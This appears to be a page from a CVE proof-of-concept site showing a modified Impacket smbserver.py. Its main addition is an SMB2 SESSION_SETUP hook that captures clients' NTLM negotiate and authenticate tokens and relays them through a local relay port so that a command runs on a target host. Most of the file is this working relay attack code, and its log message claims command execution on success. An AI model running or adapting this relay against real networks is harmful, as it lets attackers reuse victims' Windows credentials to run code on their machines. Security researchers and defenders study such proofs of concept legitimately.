5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / smbserver.py PY
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Simple SMB Server example.
#
# Author:
#   Alberto Solino (@agsolino)
#

import sys
import argparse
import logging
import socket
import struct
import random

from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket import smb3structs as smb3
from impacket import ntlm
from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, ASN1_AID, ASN1_SUPPORTED_MECH, TypesMech
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_SUCCESS, STATUS_ACCESS_DENIED

if __name__ == '__main__':

    # Show the Impacket banner before any other output
    print(version.BANNER)

    # Command-line interface: two positional arguments (share name and share path)
    # plus optional authentication, listener, logging and relay settings.
    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
                                     "share specified as an argument. Usually, you need to be root in order to bind to port 445. "
                                     "For optional authentication, it is possible to specify username and password or the NTLM hash. "
                                     "Example: smbserver.py -comment 'My share' TMP /tmp")

    parser.add_argument('shareName', action='store', help='name of the share to add')
    parser.add_argument('sharePath', action='store', help='path of the share to add')
    parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
    parser.add_argument('-username', action="store", help='Username to authenticate clients')
    parser.add_argument('-password', action="store", help='Password for the Username')
    parser.add_argument('-computeraccountname', action="store", help='computer account name to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccounthash', action="store", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccountaes', action="store", help='computer account AES key to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    # Help text previously repeated the "NT hash" wording of -computeraccounthash
    parser.add_argument('-computeraccountpassword', action="store", help='computer account password to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-computeraccountdomain', action="store", help='computer account domain to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-dc-ip', action="store", help='IP of domain controller to authenticate arbitrary clients with signing via NetLogon/Kerberos')
    parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH')
    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    # default=argparse.SUPPRESS leaves the attribute unset when -ip is omitted, so the
    # code after parsing can tell "not given" apart from an explicit address.
    parser.add_argument('-ip', '--interface-address', action='store', default=argparse.SUPPRESS, help='ip address of listening interface ("0.0.0.0" or "::" if omitted)')
    parser.add_argument('-readonly', action='store_true', help='Only allow reading of files')
    parser.add_argument('-disablekerberos', action='store_true', help='Do not offer Kerberos authentication')
    parser.add_argument('-disablentlm', action='store_true', help='Do not offer NTLM authentication')
    parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
    parser.add_argument('-dropssp', action='store_true', default=False, help='Disable NTLM ESS/SSP during negotiation')
    parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')
    parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
    parser.add_argument('-outputfile', action='store', default=None, help='Output file to log smbserver output messages')
    parser.add_argument('-relay-port', action='store', type=int, default=0, help='RAW relay server port to forward captured NTLM auth (0 = disabled)')

    # With no arguments at all, show the full help instead of argparse's terse usage error
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    # argparse reports ordinary usage errors itself and exits via SystemExit, which is
    # not an Exception subclass; this handler only covers unexpected failures.
    try:
        options = parser.parse_args()
    except Exception as e:
        logging.critical(str(e))
        sys.exit(1)

    # Configure the example logger from the -ts and -debug flags
    logger.init(options.ts, options.debug)

    # An omitted -comment is passed to the share as an empty string
    comment = '' if options.comment is None else options.comment

    # -ip is declared with default=argparse.SUPPRESS, so the attribute is absent unless
    # the user supplied it; fall back to the wildcard address of the chosen family.
    if 'interface_address' not in options:
        options.interface_address = '::' if options.ipv6 else '0.0.0.0'

    server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port), ipv6=options.ipv6)

    if options.outputfile:
        logging.info('Switching output to file %s' % options.outputfile)
        server.setLogFile(options.outputfile)

    # The share is always registered under an upper-cased name
    server.addShare(options.shareName.upper(), options.sharePath, comment, readOnly="yes" if options.readonly else "no")
    server.setSMB2Support(options.smb2support)
    server.setDropSSP(options.dropssp)
    server.setKerberosSupport(not options.disablekerberos)
    server.setNTLMSupport(not options.disablentlm)

    # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
    # connections will be allowed
    if options.username is not None:
        # we either need a password or hashes, if not, ask
        if options.password is None and options.hashes is None:
            from getpass import getpass
            password = getpass("Password:")
            # Let's convert to hashes
            lmhash = compute_lmhash(password)
            nthash = compute_nthash(password)
        elif options.password is not None:
            lmhash = compute_lmhash(options.password)
            nthash = compute_nthash(options.password)
        else:
            # -hashes must contain exactly one ':' separating LMHASH from NTHASH.
            # Report a malformed value cleanly instead of failing with a ValueError
            # traceback from tuple unpacking.
            lmhash, separator, nthash = options.hashes.partition(':')
            if not separator or ':' in nthash:
                logging.critical("Invalid -hashes value, expected format is LMHASH:NTHASH")
                sys.exit(1)

        server.addCredential(options.username, 0, lmhash, nthash)

    # Clients that enforce signing can only connect when the server has a computer
    # account to set the connection up with. Only works with SMB2.
    required_secure_server_options = [options.computeraccountname, options.computeraccountdomain, options.dc_ip]
    at_least_one_secure_server_options = [options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword]
    if any(required_secure_server_options):
        # Select the first violated constraint, checked in this order: conflict with
        # -username, incomplete mandatory trio, no secret supplied.
        if options.username:
            secure_server_error = "You cannot use account credentials AND computer account credentials at the same time"
        elif not all(required_secure_server_options):
            secure_server_error = "All of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccountname, -computeraccountdomain, -dc-ip"
        elif not any(at_least_one_secure_server_options):
            secure_server_error = "At least one of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccounthash, -computeraccountaes, -computeraccountpassword"
        else:
            secure_server_error = None

        if secure_server_error is not None:
            logging.critical(secure_server_error)
            sys.exit(1)

        server.setComputerAccount(options.computeraccountname, options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword, options.computeraccountdomain, options.dc_ip)

    # A custom SMB challenge can be supplied here as a hex string of 16 hex digits,
    # e.g. server.setSMBChallenge('12345678abcdef00').
    # Passing an empty string falls back to the default '4141414141414141'.
    server.setSMBChallenge('')

    # Relay mode is enabled only when -relay-port is a positive port number
    if options.relay_port > 0:
        internalServer = server.getServer()
        # Keep whatever hookSmb2Command returns for SMB2_SESSION_SETUP; it is later called
        # as the original handler. Presumably the call returns the previously registered
        # callback - confirm against impacket.smbserver. The None registered here is
        # replaced once the relay-aware handler has been defined.
        origSmb2SessionSetup = internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, None)

        # Per-connection relay state keyed by connId. Values used by the handler are
        # 'first_auth_done' and 'relay_negotiated'; a missing key is treated as 'init'.
        _relay_state = {}

        def _extract_raw_ntlm(securityBlob):
            rawNTLM = False
            if len(securityBlob) == 0:
                return b'', 0, rawNTLM
            firstByte = struct.unpack('B', securityBlob[0:1])[0]
            if firstByte == ASN1_AID:
                blob = SPNEGO_NegTokenInit(securityBlob)
                token = blob['MechToken']
            elif firstByte == ASN1_SUPPORTED_MECH:
                blob = SPNEGO_NegTokenResp(securityBlob)
                token = blob['ResponseToken']
            else:
                token = securityBlob
                rawNTLM = True
            if len(token) >= 12 and token[:8] == b'NTLMSSP\x00':
                msgType = struct.unpack('<I', token[8:12])[0]
            else:
                msgType = 0
            return token, msgType, rawNTLM

        def _build_spnego_challenge_resp(challengeBlob, rawNTLM):
            if rawNTLM:
                return challengeBlob
            respToken = SPNEGO_NegTokenResp()
            respToken['NegState'] = b'\x01'
            respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
            respToken['ResponseToken'] = challengeBlob
            return respToken.getData()

        def _build_spnego_auth_resp(rawNTLM):
            if rawNTLM:
                return b''
            respToken = SPNEGO_NegTokenResp()
            respToken['NegState'] = b'\x00'
            return respToken.getData()

        def _relay_recv_exact(sock, count):
            """Read exactly count bytes from sock; raise EOFError if the peer closes early."""
            chunks = []
            remaining = count
            while remaining > 0:
                chunk = sock.recv(remaining)
                if not chunk:
                    # recv() returning b'' means the peer closed; without this check a
                    # read loop would spin forever waiting for bytes that never arrive.
                    raise EOFError("connection closed with %d byte(s) still expected" % remaining)
                chunks.append(chunk)
                remaining -= len(chunk)
            return b''.join(chunks)

        def _relay_recv_frame(sock):
            """Read one frame: a 2-byte little-endian signed length followed by that many bytes."""
            frameLen = struct.unpack('<h', _relay_recv_exact(sock, 2))[0]
            return _relay_recv_exact(sock, frameLen)

        def _relay_send_frame(sock, payload):
            """Send payload prefixed with its length as a 2-byte little-endian signed integer."""
            sock.sendall(struct.pack('<h', len(payload)) + payload)

        def _relay_close(sock):
            """Best-effort close of a relay socket; close errors are logged at debug level only."""
            try:
                sock.close()
            except socket.error as e:
                logging.debug("[RELAY] Ignoring error while closing relay socket: %s", e)

        def _relay_denied():
            """Build the SESSION_SETUP reply tuple (empty security buffer, STATUS_ACCESS_DENIED)."""
            respCmd = smb3.SMB2SessionSetup_Response()
            respCmd['SecurityBufferOffset'] = 0x48
            respCmd['SecurityBufferLength'] = 0
            respCmd['Buffer'] = b''
            return [respCmd], None, STATUS_ACCESS_DENIED

        def hookedSessionSetup(connId, smbServer, recvPacket):
            """SMB2 SESSION_SETUP handler that tracks a per-connection relay state.

            State (from _relay_state, defaulting to 'init') and the NTLM message type
            found in the request select the action:

              * 'init': delegate to the original handler; once a type 3 message has been
                seen the connection moves to 'first_auth_done'.
              * 'first_auth_done' / 'relay_negotiated' with a type 1 message: open a TCP
                connection to 127.0.0.1:<relay port>, forward the token, and answer the
                client with the challenge read back (STATUS_MORE_PROCESSING_REQUIRED).
              * 'relay_negotiated' with a type 3 message: forward the token over the
                stored socket, read a one-byte boolean result, and answer with
                STATUS_SUCCESS or STATUS_ACCESS_DENIED.
              * anything else: log a warning and delegate to the original handler.

            Returns whatever the original handler returns, or a tuple
            ([response command], None, NT status) for the relay-specific replies.
            """
            connData = smbServer.getConnectionData(connId, checkStatus=False)

            sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
            securityBlob = sessionSetupData['Buffer']

            token, msgType, rawNTLM = _extract_raw_ntlm(securityBlob)

            state = _relay_state.get(connId, 'init')

            if state == 'init':
                result = origSmb2SessionSetup(connId, smbServer, recvPacket)
                if msgType == 3:
                    _relay_state[connId] = 'first_auth_done'
                return result

            if state in ('first_auth_done', 'relay_negotiated') and msgType == 1:
                # Drop any relay socket left over from a previous, unfinished attempt
                oldSock = connData.get('relaySocket')
                if oldSock:
                    _relay_close(oldSock)
                    connData['relaySocket'] = None
                logging.info("[RELAY] Second SESSION_SETUP detected (NTLM NEGOTIATE) - relaying to RAW server port %d", options.relay_port)
                sock = None
                try:
                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    sock.settimeout(10)
                    sock.connect(('127.0.0.1', options.relay_port))
                    _relay_send_frame(sock, token)
                    challengeBlob = _relay_recv_frame(sock)
                except Exception as e:
                    logging.error("[RELAY] Failed to connect/relay NEGOTIATE to RAW server: %s", e)
                    # The socket used to leak on this path; release it before giving up
                    if sock is not None:
                        _relay_close(sock)
                    return _relay_denied()

                connData['relaySocket'] = sock
                connData['relayRawNTLM'] = rawNTLM
                connData['Uid'] = random.randint(1, 0xffffffff)
                _relay_state[connId] = 'relay_negotiated'

                respBytes = _build_spnego_challenge_resp(challengeBlob, rawNTLM)
                respCmd = smb3.SMB2SessionSetup_Response()
                respCmd['SecurityBufferOffset'] = 0x48
                respCmd['SecurityBufferLength'] = len(respBytes)
                respCmd['Buffer'] = respBytes
                smbServer.setConnectionData(connId, connData)
                return [respCmd], None, STATUS_MORE_PROCESSING_REQUIRED

            if state == 'relay_negotiated' and msgType == 3:
                logging.info("[RELAY] Received NTLM AUTHENTICATE - forwarding to RAW server")
                sock = connData.get('relaySocket')
                if sock is None:
                    return _relay_denied()

                try:
                    _relay_send_frame(sock, token)
                    resultData = _relay_recv_frame(sock)
                    # An empty result raises struct.error here and is treated as a failure
                    relaySuccess = struct.unpack('?', resultData[:1])[0]
                except Exception as e:
                    logging.error("[RELAY] Failed to relay AUTH to RAW server: %s", e)
                    # Do not keep a reference to a socket that is about to be closed
                    connData['relaySocket'] = None
                    return _relay_denied()
                finally:
                    # The relay socket is single-use: close it on success and failure alike
                    _relay_close(sock)

                if relaySuccess:
                    logging.info("[RELAY] NTLM relay succeeded! Command should have been executed on target.")
                    connData['Authenticated'] = True
                    connData['relaySocket'] = None
                    _relay_state[connId] = 'first_auth_done'
                    # Use the wrapping mode recorded during the NEGOTIATE step
                    respBytes = _build_spnego_auth_resp(connData.get('relayRawNTLM', False))
                    respCmd = smb3.SMB2SessionSetup_Response()
                    respCmd['SecurityBufferOffset'] = 0x48
                    respCmd['SecurityBufferLength'] = len(respBytes)
                    respCmd['Buffer'] = respBytes
                    smbServer.setConnectionData(connId, connData)
                    return [respCmd], None, STATUS_SUCCESS

                logging.error("[RELAY] NTLM relay failed - authentication rejected")
                connData['relaySocket'] = None
                _relay_state[connId] = 'first_auth_done'
                return _relay_denied()

            logging.warning("[RELAY] Unexpected state=%s msgType=%d", state, msgType)
            return origSmb2SessionSetup(connId, smbServer, recvPacket)

        # Register hookedSessionSetup as the handler for SMB2 SESSION_SETUP requests
        internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, hookedSessionSetup)
        logging.info("[RELAY] SMB2 SESSION_SETUP hook installed, relay port=%d", options.relay_port)

    # Rock and roll: start the server and keep running until start() returns or the
    # user interrupts it
    try:
        server.start()
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C; 130 is the conventional shell status for
        # termination by SIGINT (128 + 2)
        print("\nInterrupted, exiting...")
        sys.exit(130)